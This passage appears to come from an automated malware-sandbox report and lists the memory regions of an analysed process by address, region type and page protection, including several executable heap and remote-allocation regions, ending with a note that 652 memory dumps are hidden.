page read and write
|
||
|
6400000
|
direct allocation
|
page read and write
|
||
|
2E32000
|
stack
|
page read and write
|
||
|
228C0000
|
unclassified section
|
page execute and read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
6EF000
|
stack
|
page read and write
|
||
|
4770000
|
trusted library allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
68C0000
|
direct allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
6880000
|
direct allocation
|
page read and write
|
||
|
2251B000
|
heap
|
page read and write
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
30DC000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
25FD000
|
stack
|
page read and write
|
||
|
30F6000
|
heap
|
page read and write
|
||
|
40E2000
|
trusted library allocation
|
page read and write
|
||
|
61D7000
|
heap
|
page read and write
|
||
|
6890000
|
direct allocation
|
page read and write
|
||
|
224D2000
|
heap
|
page read and write
|
||
|
2EFD000
|
heap
|
page read and write
|
||
|
6EE06000
|
unkown
|
page readonly
|
||
|
358E000
|
stack
|
page read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
7C1E000
|
stack
|
page read and write
|
||
|
2F40000
|
heap
|
page readonly
|
||
|
23DE000
|
stack
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
2254A000
|
heap
|
page read and write
|
||
|
21E6B000
|
stack
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
310F000
|
heap
|
page read and write
|
||
|
418F000
|
stack
|
page read and write
|
||
|
6E96000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
2872000
|
heap
|
page read and write
|
||
|
467E000
|
stack
|
page read and write
|
||
|
6540000
|
heap
|
page read and write
|
||
|
24FD000
|
stack
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
21FEC000
|
stack
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
4CAC000
|
trusted library allocation
|
page read and write
|
||
|
2E16000
|
stack
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
40DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
40C0000
|
trusted library allocation
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
22241000
|
heap
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
7F00000
|
trusted library allocation
|
page read and write
|
||
|
4C1A000
|
heap
|
page read and write
|
||
|
4711000
|
trusted library allocation
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4BCC000
|
heap
|
page read and write
|
||
|
4BCE000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
70DD000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
21C90000
|
remote allocation
|
page read and write
|
||
|
22130000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
22332000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
4BDE000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BCC000
|
heap
|
page read and write
|
||
|
821D000
|
stack
|
page read and write
|
||
|
27CC000
|
heap
|
page read and write
|
||
|
224E9000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
4866000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
68B0000
|
direct allocation
|
page read and write
|
||
|
3273000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
2FA8000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
29AE000
|
unkown
|
page read and write
|
||
|
22060000
|
unclassified section
|
page execute and read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
2430000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
811C000
|
stack
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
542F000
|
stack
|
page read and write
|
||
|
6820000
|
direct allocation
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
678E000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
6EDF1000
|
unkown
|
page execute read
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
53AF000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
3230000
|
trusted library allocation
|
page read and write
|
||
|
815E000
|
stack
|
page read and write
|
||
|
221AA000
|
heap
|
page read and write
|
||
|
451000
|
unkown
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
59E000
|
stack
|
page read and write
|
||
|
6F10000
|
trusted library allocation
|
page read and write
|
||
|
6E36000
|
heap
|
page read and write
|
||
|
7EB000
|
heap
|
page read and write
|
||
|
7B80000
|
heap
|
page read and write
|
||
|
41D0000
|
trusted library allocation
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D12000
|
heap
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
785000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4B9F000
|
stack
|
page read and write
|
||
|
68D0000
|
direct allocation
|
page read and write
|
||
|
278E000
|
stack
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
6810000
|
direct allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
50A0000
|
heap
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
221A9000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
21D10000
|
heap
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
40D000
|
unkown
|
page read and write
|
||
|
2F3D000
|
stack
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
4CB2000
|
trusted library allocation
|
page read and write
|
||
|
40D0000
|
trusted library allocation
|
page read and write
|
||
|
40B0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page read and write
|
||
|
2319000
|
stack
|
page read and write
|
||
|
4BFF000
|
heap
|
page read and write
|
||
|
6E00000
|
heap
|
page read and write
|
||
|
2202E000
|
stack
|
page read and write
|
||
|
6860000
|
direct allocation
|
page read and write
|
||
|
2BFA000
|
stack
|
page read and write
|
||
|
30E8000
|
heap
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
32FA000
|
heap
|
page read and write
|
||
|
22090000
|
direct allocation
|
page read and write
|
||
|
21D6C000
|
stack
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
6805000
|
heap
|
page execute and read and write
|
||
|
21C90000
|
remote allocation
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
6E58000
|
heap
|
page read and write
|
||
|
55AF000
|
remote allocation
|
page execute and read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
68E0000
|
direct allocation
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
224B9000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page execute and read and write
|
||
|
46EE000
|
stack
|
page read and write
|
||
|
457C000
|
stack
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
7EF5000
|
trusted library allocation
|
page read and write
|
||
|
21870000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
2E1B000
|
stack
|
page read and write
|
||
|
2E70000
|
heap
|
page readonly
|
||
|
21B6E000
|
stack
|
page read and write
|
||
|
7C60000
|
heap
|
page read and write
|
||
|
32DF000
|
stack
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
22221000
|
heap
|
page read and write
|
||
|
22899000
|
unclassified section
|
page execute and read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
22940000
|
heap
|
page read and write
|
||
|
21D0F000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
5FAF000
|
remote allocation
|
page execute and read and write
|
||
|
27DE000
|
stack
|
page read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
705F000
|
stack
|
page read and write
|
||
|
6420000
|
direct allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
463E000
|
stack
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
6150000
|
heap
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4BFF000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
22CE000
|
stack
|
page read and write
|
||
|
288E000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
31DF000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
6870000
|
direct allocation
|
page read and write
|
There are 652 hidden memdumps, click here to show them.